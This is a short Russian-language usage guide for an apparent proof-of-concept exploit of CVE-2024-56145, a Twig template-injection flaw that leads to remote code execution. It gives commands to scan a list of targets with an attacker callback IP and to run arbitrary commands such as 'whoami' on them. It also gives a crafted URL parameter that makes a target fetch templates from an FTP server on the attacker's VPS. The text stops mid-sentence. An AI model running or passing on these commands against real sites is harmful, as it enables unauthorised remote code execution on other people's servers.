
CVE-2024-56145 SSTI в RCE - шаблоны twig
fuser -k 6666/tcp
python3 poc.py -f targets.txt -i 127.0.0.1 -pr 4 -t 200
Можно использовать пользовательскую команду, например: python3 poc.py -f targets.txt -i 127.0.0.1 -c "whoami"
-i — это ваш IP-адрес или IP вашего VPS (получить его можно с помощью ipconfig / ifconfig.
Пример: python3 poc.py -f targets.txt -i 165.22.104.140 -pr 4 -t 200
Что дальше? У вас есть уязвимая цель, но хочется поиграть ещё? Я добавил poc2.py для ручного тестирования цели. Как это сделать?
выполните fuser -k 6666/tcp
1. Запустите poc2.py (порт 6666 будет запущен как FTP).
2. Откройте браузер: yourtarget.com/?--templatesPath=ftp://VPS-IP:6666/
3. Вы увидите —

Написал Chirag Artani (https://x.com/Chirag99Artani)